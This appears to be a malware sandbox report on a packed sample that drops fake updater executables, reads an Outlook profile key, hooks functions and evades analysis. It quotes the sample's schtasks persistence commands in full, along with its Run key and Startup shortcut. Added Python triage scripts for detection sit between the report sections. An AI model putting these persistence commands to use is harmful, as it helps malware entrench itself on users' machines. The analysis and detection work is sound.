Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
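The process-creation lines above record three distinct schtasks.exe invocations: two hourly/logon tasks for MSIUpdaterV2.exe with /rl HIGHEST, and a "Telemetry Logging" task that re-launches oobeldr.exe every minute. The following triage script is an added example, not part of the report: it parses schtasks command lines out of process-creation log lines and scores the persistence traits a responder cares about (binary in a user-writable directory, minute-level repetition, highest run level, /f overwrite). The sample log lines are copied from the report; the suspicious-directory list, the "every N minutes" cutoff and the finding texts are this example's own choices.

```python
"""Triage schtasks.exe command lines from process-creation log lines (added example)."""
import re

# User-writable locations a legitimate scheduled updater rarely runs from (assumption).
SUSPICIOUS_DIRS = ("\\programdata\\", "\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\appdata\\local\\")
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_PROC = re.compile(r"Process created: (\S*schtasks\.exe) (.*)$", re.I)

SAMPLE_LOG = [  # copied from the report
    r'Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST',
    r'Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST',
    r'Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"',
]


def parse_schtasks(cmdline):
    """Map /flag -> value (or True for bare flags); keys lower-cased, quotes stripped."""
    toks = [q or p for q, p in _TOKEN.findall(cmdline)]
    args, i = {}, 0
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                args[key] = toks[i + 1]
                i += 2
                continue
            args[key] = True
        i += 1
    return args


def assess(args):
    """Findings for one parsed /create invocation."""
    findings = []
    action = str(args.get("tr", "")).lower()
    if any(d in action for d in SUSPICIOUS_DIRS):
        findings.append("action binary lives in a user-writable directory")
    if str(args.get("sc", "")).lower() == "minute":
        try:
            every = int(args.get("mo", 1))
        except ValueError:
            every = 1
        if every <= 5:  # cutoff assumed; the report's task uses /mo 1
            findings.append(f"re-runs every {every} minute(s): restarts the payload if it is killed")
    if str(args.get("sc", "")).lower() in ("onlogon", "onstart"):
        findings.append("re-launches at every logon/boot")
    if str(args.get("rl", "")).lower() == "highest":
        findings.append("requests the highest available integrity level")
    if "f" in args:
        findings.append("/f silently overwrites an existing task of the same name")
    return findings


def triage(log_lines):
    """Extract every schtasks /create from process-creation lines and assess it."""
    results = []
    for line in log_lines:
        m = _PROC.search(line)
        if not m:
            continue
        args = parse_schtasks(m.group(2))
        if "create" not in args:
            continue
        schedule = str(args.get("sc", "")) + (f" every {args['mo']}" if "mo" in args else "")
        results.append({"task": args.get("tn"), "action": args.get("tr"),
                        "schedule": schedule, "findings": assess(args)})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["task"], "|", r["schedule"], "|", r["action"])
        for f in r["findings"]:
            print("   -", f)
```

On a live system the same parser can be fed the command lines from Sysmon event 1 or Security event 4688; a /create whose /tr points into ProgramData or AppData with /sc minute is a stronger signal than either trait alone.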
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll Jump to behavior
Source: EdgeMS2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 8778752 > 1048576
Source: file.exe Static PE information: Raw size of .vmpY[. is bigger than: 0x100000 < 0x838200

Data Obfuscation


Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 7.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 8.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Unpacked PE file: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 17.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 18.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 19.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_06D4C990
Source: initial sample Static PE information: section where entry point is pointing to: .vmpY[.
Source: file.exe Static PE information: section name: .vmp#+
Source: file.exe Static PE information: section name: .vmp#+
Source: file.exe Static PE information: section name: .vmp#+
Source: file.exe Static PE information: section name: .vmpY[.
Source: file.exe Static PE information: section name: .vmpY[.
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: llmcrdwzLnNKYB4T0Vnw.exe.0.dr Static PE information: section name: .MPRESS1
Source: llmcrdwzLnNKYB4T0Vnw.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.9.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.9.dr Static PE information: section name: .MPRESS2
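The static indicators above (section names .vmp#+ and .vmpY[. on file.exe, .MPRESS1/.MPRESS2 on every dropped executable, an entry point in .vmpY[., and dumps whose sections are EW in memory but ER on disk) can all be reproduced from the section table alone. The following parser is an added example, not part of the report and not a sandbox component: it reads a PE32 section table with nothing but struct and reports section names with characters outside [A-Za-z0-9._$], names typical of known packers (.MPRESS1/.MPRESS2 for MPRESS, .vmp* for VMProtect, UPX0/UPX1 for UPX), sections that are writable and executable at once, and an entry point outside the usual code section. The two headers it builds mirror the report's section layouts; their addresses and sizes are invented, and placing the MPRESS entry point in .MPRESS2 is an assumption for the demo.

```python
"""Static section-table checks for packer indicators (added example)."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_SECTIONS = {".text", ".code", "CODE", ".textbss"}
PACKER_PREFIXES = {".MPRESS": "MPRESS", ".vmp": "VMProtect", "UPX": "UPX"}


def parse_pe(pe_bytes):
    """Entry point RVA and section records of a PE image header."""
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[:2] != b"MZ" or pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", pe_bytes, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe_bytes, coff + 16)[0]
    opt = coff + 20
    entry = struct.unpack_from("<I", pe_bytes, opt + 16)[0]  # AddressOfEntryPoint (PE32 and PE32+)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name = pe_bytes[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, raw_size = struct.unpack_from("<III", pe_bytes, off + 8)
        chars = struct.unpack_from("<I", pe_bytes, off + 36)[0]
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_size": raw_size, "chars": chars})
    return {"entry": entry, "sections": sections}


def rights(chars):
    """E/R/W letters for a section's memory characteristics, as the report prints them."""
    flags = (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE))
    return "".join(letter for letter, bit in flags if chars & bit)


def assess(pe):
    """(section holding the entry point, list of findings)."""
    findings, entry_section = [], None
    for s in pe["sections"]:
        name = s["name"]
        if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], s["raw_size"]):
            entry_section = name
        if not all(c.isascii() and (c.isalnum() or c in "._$") for c in name):
            findings.append(f"section name {name!r} contains special characters")
        for prefix, packer in PACKER_PREFIXES.items():
            if name.startswith(prefix):
                findings.append(f"section {name!r} is typical of the {packer} packer")
        r = rights(s["chars"])
        if "E" in r and "W" in r:
            findings.append(f"section {name!r} is writable and executable ({r})")
    if entry_section is None:
        findings.append("entry point lies outside every section")
    elif entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point lies in non-standard section {entry_section!r}")
    return entry_section, findings


def build_pe32(sections, entry):
    """Constructed minimal PE32 header (no section bodies) for the demo."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                 # AddressOfEntryPoint
    table = b"".join(struct.pack("<8sIIIIIIHHI", name, size, va, size, 0, 0, 0, 0, 0, chars)
                     for name, va, size, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


ER = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
R = IMAGE_SCN_MEM_READ
# Layout mirroring file.exe: VMProtect sections with special characters, entry inside .vmpY[.
SAMPLE_VMP = build_pe32([(b".text", 0x1000, 0x200000, ER), (b".rdata", 0x201000, 0x10000, R),
                         (b".data", 0x211000, 0x10000, RW), (b".vmp#+", 0x221000, 0x1000, ER),
                         (b".vmpY[.", 0x300000, 0x838200, ER)], entry=0x300010)
# Layout mirroring the MPRESS-packed droppers; entry placed in .MPRESS2 (assumption)
SAMPLE_MPRESS = build_pe32([(b".MPRESS1", 0x1000, 0x20000, ER), (b".MPRESS2", 0x21000, 0x1000, ER),
                            (b".rsrc", 0x22000, 0x1000, RW)], entry=0x21010)

if __name__ == "__main__":
    for label, blob in (("file.exe-like", SAMPLE_VMP), ("MPRESS-like", SAMPLE_MPRESS)):
        pe = parse_pe(blob)
        print(label, [(s["name"], rights(s["chars"])) for s in pe["sections"]], assess(pe))
```

To reproduce the report's "changes PE section rights" verdict, run parse_pe over the on-disk file and over a memory dump of the same image and compare rights() per section; a section that is ER on disk and EW in the dump was rewritten at run time, which is what an unpacking stub does before transferring control.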
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D8C245 push esi; ret 0_2_06D8C24E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D8CE63 push es; iretd 0_2_06D8CE64
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D68F27 push es; ret 0_2_06D68F45
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D65B83 push ecx; ret 0_2_06D65B96
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Code function: 7_2_006D50A5 push ebp; ret 7_2_00721C57
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe (copy)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe Memory written: PID: 4112 base: 15F0005 value: E9 8B 2F 90 75 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 4112 base: 76EF2F90 value: E9 7A D0 6F 8A Jump to behavior
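Both memory writes above begin with E9, the x86 opcode for a 5-byte jmp with a signed 32-bit displacement relative to the next instruction, which is the primitive behind the "overwrites code with unconditional jumps" signature. The following decoder is an added example, not part of the report: it computes the target of each write and pairs the two as an inline hook and its trampoline. The two write records are copied from the lines above; reading 0x76EF2F90 as the first bytes of a function in a loaded module is an inference from the arithmetic (the report does not name the module), and the five displaced original bytes, which such a trampoline would hold just before 0x15F0005, are not shown in the report.

```python
"""Decode E9 rel32 memory writes and pair hook with trampoline (added example)."""
import re
import struct

REPORT_WRITES = [  # copied from the report
    "Memory written: PID: 4112 base: 15F0005 value: E9 8B 2F 90 75",
    "Memory written: PID: 4112 base: 76EF2F90 value: E9 7A D0 6F 8A",
]
_WRITE = re.compile(r"base: ([0-9A-Fa-f]+) value: ((?:[0-9A-Fa-f]{2}\s?)+)")


def parse_write(line):
    """(base address, written bytes) from a 'Memory written' report line."""
    m = _WRITE.search(line)
    if not m:
        raise ValueError("no memory write in line")
    return int(m.group(1), 16), bytes.fromhex(m.group(2).replace(" ", ""))


def jmp_rel32_target(base, code):
    """Absolute target of a 5-byte E9 jmp located at `base` (32-bit x86)."""
    if len(code) != 5 or code[0] != 0xE9:
        raise ValueError("not an E9 rel32 jump")
    rel = struct.unpack("<i", code[1:])[0]   # signed displacement from the next instruction
    return (base + 5 + rel) & 0xFFFFFFFF


def pair_hook_with_trampoline(writes):
    """Match a hook jmp (written over a function's first 5 bytes) with the
    trampoline jmp that resumes that function right after the patched bytes."""
    targets = {base: jmp_rel32_target(base, code) for base, code in writes}
    pairs = []
    for hook_at, detour in targets.items():
        for tramp_at, resume in targets.items():
            if tramp_at != hook_at and resume == hook_at + 5:
                pairs.append({"hooked_function": hook_at, "detour": detour,
                              "trampoline_jmp": tramp_at, "resume_at": resume})
    return targets, pairs


if __name__ == "__main__":
    targets, pairs = pair_hook_with_trampoline([parse_write(l) for l in REPORT_WRITES])
    for base, tgt in targets.items():
        print(f"jmp at {base:08X} -> {tgt:08X}")
    for p in pairs:
        print({k: f"{v:08X}" for k, v in p.items()})
```

The arithmetic gives 0x76EF2F90 -> 0x015F000F and 0x015F0005 -> 0x76EF2F95: the write at the high address redirects a function's entry into memory the sample controls, and the write at 0x15F0005 jumps back to that function plus five bytes, exactly where execution must resume after the displaced prologue has been re-executed. When reviewing a memory dump, walk the same two hops and disassemble at the detour address to see what the hook does before (or instead of) calling the original.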
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D57890 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_06D57890
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFE543 second address: EFE547 instructions: 0x00000000 rdtsc 0x00000002 not cl 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 3658 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 493 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 5011 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
